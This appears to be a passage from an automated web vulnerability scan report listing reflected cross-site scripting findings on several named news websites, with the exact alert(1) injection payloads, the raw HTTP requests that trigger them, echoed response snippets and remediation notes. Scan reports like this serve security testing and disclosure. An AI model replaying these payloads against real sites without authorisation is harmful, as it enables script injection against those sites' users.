X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=BMOMAGMLJKQXZQE1GHPCKH4ATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 23295
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a45c"-alert(1)-"52d89e7f6ea was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/infrastructure/ethernet/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1a45c"-alert(1)-"52d89e7f6ea
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Mon, 13 Dec 2010 03:23:16 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Mon, 13 Dec 2010 03:23:16 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=1GX1VSYQ2A5LXQE1GHOSKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 31894
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1a45c"-alert(1)-"52d89e7f6ea"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be109"-alert(1)-"bffe0260edf was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /archives.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)be109"-alert(1)-"bffe0260edf
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Mon, 13 Dec 2010 03:24:50 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Last-modified: Mon, 13 Dec 2010 02:24:49 GMT
Expires: Mon, 11 Apr 2011 22:24:49 GMT
Etag: s200805.p200805
Content-Length: 177192
Set-Cookie: lightreading%5Flastvisit=12%2F12%2F2010+10%3A24%3A49+PM; expires=Wed, 12-Dec-2035 05:00:00 GMT; path=/
Set-Cookie: lightreading%5Fvisits=1; expires=Wed, 12-Dec-2035 05:00:00 GMT; path=/
Cache-control: max-age=10368000, public
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)be109"-alert(1)-"bffe0260edf"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e0ef"-alert(1)-"58f32a845f5 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)6e0ef"-alert(1)-"58f32a845f5
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Mon, 13 Dec 2010 03:33:59 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 259711
Set-Cookie: lightreading%5Flastvisit=12%2F12%2F2010+10%3A33%3A58+PM; expires=Wed, 12-Dec-2035 05:00:00 GMT; path=/
Set-Cookie: lightreading%5Fvisits=1; expires=Wed, 12-Dec-2035 05:00:00 GMT; path=/
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)6e0ef"-alert(1)-"58f32a845f5"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61c1f"-alert(1)-"14b12173567 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /calendar_webinars.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)61c1f"-alert(1)-"14b12173567
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Mon, 13 Dec 2010 03:27:22 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 239411
Set-Cookie: lightreading%5Flastvisit=12%2F12%2F2010+10%3A27%3A21+PM; expires=Wed, 12-Dec-2035 05:00:00 GMT; path=/
Set-Cookie: lightreading%5Fvisits=1; expires=Wed, 12-Dec-2035 05:00:00 GMT; path=/
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)61c1f"-alert(1)-"14b12173567"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1bc6c"-alert(1)-"9bf08f4672b was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /document.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1bc6c"-alert(1)-"9bf08f4672b
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Mon, 13 Dec 2010 03:32:33 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 259761
Set-Cookie: lightreading%5Flastvisit=12%2F12%2F2010+10%3A32%3A33+PM; expires=Wed, 12-Dec-2035 05:00:00 GMT; path=/
Set-Cookie: lightreading%5Fvisits=1; expires=Wed, 12-Dec-2035 05:00:00 GMT; path=/
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1bc6c"-alert(1)-"9bf08f4672b"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2d7f2"-alert(1)-"493dca2071d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live/event_information.asp HTTP/1.1
Host: www.lightreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)2d7f2"-alert(1)-"493dca2071d
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Server: nginx/0.8.50
Date: Mon, 13 Dec 2010 03:27:26 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Content-Length: 176572
Set-Cookie: lightreading%5Flastvisit=12%2F12%2F2010+10%3A27%3A25+PM; expires=Wed, 12-Dec-2035 05:00:00 GMT; path=/
Set-Cookie: lightreading%5Fvisits=1; expires=Wed, 12-Dec-2035 05:00:00 GMT; path=/
Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)2d7f2"-alert(1)-"493dca2071d"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
1.83. http://analytics.informationweek.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://analytics.informationweek.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ab5f3--><script>alert(1)</script>6d288c3a83b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?ab5f3--><script>alert(1)</script>6d288c3a83b=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... gin?service=http%3A%2F%2Fanalytics.informationweek.com%2F%3Fab5f3--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E6d288c3a83b%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/?ab5f3--><script>alert(1)</script>6d288c3a83b=1"> ...[SNIP]...
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fe09"-alert(1)-"b96a344b969 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8fe09"-alert(1)-"b96a344b969
Connection: close
1.85. http://www.darkreading.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.darkreading.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95fb2"><script>alert(1)</script>cc29b91effa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?95fb2"><script>alert(1)</script>cc29b91effa=1 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af580'%3bb88f87bc89a was submitted in the REST URL parameter 3. This input was echoed as af580';b88f87bc89a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/evil_bytesaf580'%3bb88f87bc89a/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61170"><script>alert(1)</script>23847e95b68 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /blog/archives/evil_bytes61170"><script>alert(1)</script>23847e95b68/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7b4c"><a>ab17b4636b8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /blog/archives/evil_bytes/index.htmlc7b4c"><a>ab17b4636b8 HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13c8e"-alert(1)-"aa8e6fae200 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/archives/evil_bytes/index.html HTTP/1.1
Host: www.darkreading.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)13c8e"-alert(1)-"aa8e6fae200
Connection: close